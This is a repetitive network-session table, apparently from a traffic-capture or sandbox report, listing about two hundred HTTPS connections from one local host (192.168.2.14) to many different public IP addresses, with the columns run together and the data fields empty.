                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19818192.168.2.1440770114.239.117.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19819192.168.2.14340085.115.253.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19820192.168.2.1434770186.120.74.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19821192.168.2.1451614112.212.100.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19822192.168.2.143748254.225.182.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19823192.168.2.143894887.171.251.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19824192.168.2.144149261.226.0.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19825192.168.2.1439544105.39.73.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19826192.168.2.1446754110.237.91.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19827192.168.2.145107685.148.14.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19828192.168.2.1453418199.41.0.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19829192.168.2.144877695.24.32.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19830192.168.2.145064051.117.213.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19831192.168.2.144744041.63.168.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19832192.168.2.1453412122.220.245.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19833192.168.2.1444266167.18.231.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19834192.168.2.1444886134.149.228.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19835192.168.2.1439484179.219.194.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19836192.168.2.1446512181.114.109.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19837192.168.2.144661879.154.238.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19838192.168.2.144080261.232.73.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19839192.168.2.1439010129.218.215.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19840192.168.2.145474648.74.241.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19841192.168.2.1449934220.97.220.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19842192.168.2.145923697.160.149.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19843192.168.2.1456054165.144.153.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19844192.168.2.1445372143.239.60.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19845192.168.2.1452450107.18.90.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19846192.168.2.1439016115.179.56.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19847192.168.2.1434916109.251.58.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19848192.168.2.1454994105.156.208.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19849192.168.2.1437078207.152.48.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19850192.168.2.1451896164.219.6.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19851192.168.2.1444070157.74.108.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19852192.168.2.1453804210.78.235.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19853192.168.2.144686051.127.142.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19854192.168.2.1444630131.54.182.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19855192.168.2.1444626212.183.247.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19856192.168.2.1457140188.230.76.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19857192.168.2.1434062159.140.230.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19858192.168.2.1443730196.182.100.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19859192.168.2.146036083.139.70.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19860192.168.2.1445366183.163.162.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19861192.168.2.1455050209.69.23.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19862192.168.2.143551814.159.160.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19863192.168.2.1457398173.6.22.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19864192.168.2.1455256213.207.171.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19865192.168.2.145474413.237.35.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19866192.168.2.144148648.217.4.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19867192.168.2.1448830113.28.113.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19868192.168.2.1438794135.71.171.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19869192.168.2.144498831.185.65.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19870192.168.2.145520213.58.92.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19871192.168.2.1441832116.22.83.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19872192.168.2.144950617.52.238.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19873192.168.2.145631643.79.215.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19874192.168.2.145180696.115.89.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19875192.168.2.144590884.218.40.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19876192.168.2.143371057.211.221.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19877192.168.2.143898044.171.167.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19878192.168.2.1452832168.196.92.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19879192.168.2.1453586217.65.13.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19880192.168.2.145133472.32.94.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19881192.168.2.1447380134.111.147.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19882192.168.2.144137449.207.164.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19883192.168.2.1457478112.3.71.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19884192.168.2.1443530198.87.77.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19885192.168.2.1447110221.145.150.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19886192.168.2.1440274139.38.15.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19887192.168.2.144042636.127.49.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19888192.168.2.1442326150.173.231.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19889192.168.2.143528274.213.199.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19890192.168.2.144383839.69.105.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19891192.168.2.144506078.143.119.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19892192.168.2.143449435.179.104.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19893192.168.2.1454148123.42.142.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19894192.168.2.145750262.75.53.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19895192.168.2.1446920218.192.136.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19896192.168.2.145667445.128.117.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19897192.168.2.1441558100.195.224.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19898192.168.2.145875654.201.11.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19899192.168.2.143284235.24.5.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19900192.168.2.1453550201.244.162.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19901192.168.2.144679863.37.36.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19902192.168.2.1442990156.120.2.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19903192.168.2.1458836206.88.125.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19904192.168.2.1436170201.61.47.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19905192.168.2.1449846157.101.54.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19906192.168.2.144499414.110.104.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19907192.168.2.143315025.116.82.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19908192.168.2.1441708209.188.122.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19909192.168.2.144509460.91.88.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19910192.168.2.1452832199.140.26.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19911192.168.2.1432878131.44.138.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19912192.168.2.145793220.46.115.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19913192.168.2.1436330154.133.45.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19914192.168.2.1459746120.185.105.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19915192.168.2.145526243.241.128.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19916192.168.2.144967866.30.12.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19917192.168.2.1447850212.105.87.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19918192.168.2.1449614126.69.94.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19919192.168.2.143556060.154.157.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19920192.168.2.1446256100.178.238.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19921192.168.2.1439558143.42.53.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19922192.168.2.144146680.2.124.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19923192.168.2.1453068203.126.186.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19924192.168.2.1458234191.27.65.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19925192.168.2.145934212.47.106.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19926192.168.2.1447168140.71.195.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19927192.168.2.1440960197.236.88.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19928192.168.2.1453468219.197.225.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19929192.168.2.1455522168.202.86.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19930192.168.2.144004469.250.137.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19931192.168.2.1434446122.122.162.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19932192.168.2.1440590120.230.220.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19933192.168.2.1446164140.123.241.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19934192.168.2.145017819.241.49.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19935192.168.2.145823059.149.230.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19936192.168.2.143383251.17.15.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19937192.168.2.1457134139.46.149.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19938192.168.2.1452850222.51.150.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19939192.168.2.1444782151.222.155.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19940192.168.2.1442966210.165.52.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19941192.168.2.1454536180.86.36.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19942192.168.2.1443148104.111.53.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19943192.168.2.1436668221.69.211.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19944192.168.2.1446814185.38.161.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19945192.168.2.143722095.146.249.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19946192.168.2.1456566119.71.210.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19947192.168.2.143829832.174.239.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19948192.168.2.144468224.178.180.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19949192.168.2.1435910147.236.4.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19950192.168.2.144585898.117.44.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19951192.168.2.1455268174.159.32.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19952192.168.2.144328641.68.99.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19953192.168.2.1452706208.45.72.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19954192.168.2.14419922.234.87.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19955192.168.2.1448768126.12.24.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19956192.168.2.1458110203.130.239.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19957192.168.2.1435966207.245.133.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19958192.168.2.1441432116.209.147.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19959192.168.2.145055290.3.39.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19960192.168.2.144948261.121.140.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19961192.168.2.144129498.235.100.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19962192.168.2.1435678183.228.187.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19963192.168.2.145162234.185.156.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19964192.168.2.144556458.61.158.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19965192.168.2.145221297.115.49.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19966192.168.2.1447902211.127.164.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19967192.168.2.1460808142.178.195.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19968192.168.2.145700676.104.88.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19969192.168.2.145930446.105.4.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19970192.168.2.144184299.174.199.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19971192.168.2.1439306216.38.40.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19972192.168.2.1450758126.28.98.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19973192.168.2.143827490.77.231.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19974192.168.2.1443604162.3.116.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19975192.168.2.1453572186.227.139.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19976192.168.2.144148459.237.17.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19977192.168.2.1442516188.251.49.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19978192.168.2.1452794174.111.146.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19979192.168.2.1447186144.84.34.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19980192.168.2.145207078.213.186.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19981192.168.2.144034625.94.223.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19982192.168.2.1438926194.122.113.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19983192.168.2.144695044.12.233.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19984192.168.2.145455681.228.56.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19985192.168.2.144102420.199.27.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19986192.168.2.143603647.52.62.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19987192.168.2.144950227.21.187.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19988192.168.2.1452326178.153.164.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19989192.168.2.144681280.170.220.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19990192.168.2.145647869.209.235.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19991192.168.2.144895673.77.251.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19992192.168.2.1459224197.83.167.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19993192.168.2.145740435.198.29.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19994192.168.2.1452944194.43.133.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19995192.168.2.143902668.148.15.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19996192.168.2.1448670222.49.157.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19997192.168.2.145172272.50.224.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19998192.168.2.1458704200.126.195.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19999192.168.2.1457098189.65.81.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20000192.168.2.1444120122.214.146.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20001192.168.2.1456102206.147.253.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20002192.168.2.1438542200.131.73.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20003192.168.2.143553643.181.28.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20004192.168.2.1453098133.174.136.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20005192.168.2.143759434.100.229.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20006192.168.2.14450608.244.235.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20007192.168.2.1441092191.223.125.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20008192.168.2.1456430122.56.91.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20009192.168.2.144153297.28.215.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20010192.168.2.1436630209.131.149.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20011192.168.2.1438364119.146.235.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20012192.168.2.1455808184.214.220.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20013192.168.2.146033698.107.100.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20014192.168.2.1449200191.15.121.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20015192.168.2.144061631.203.212.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20016192.168.2.1442198184.192.99.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20017192.168.2.143876614.163.108.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20018192.168.2.144015647.209.145.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20019192.168.2.1448496134.218.67.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20020192.168.2.1459080209.54.210.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20021192.168.2.1436504181.100.196.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20022192.168.2.144231271.228.31.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20023192.168.2.143506098.131.128.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20024192.168.2.144568423.221.215.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20025192.168.2.1456036123.30.126.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20026192.168.2.143312279.94.157.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20027192.168.2.145448682.106.121.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20028192.168.2.145878294.8.168.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20029192.168.2.1454934180.12.104.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
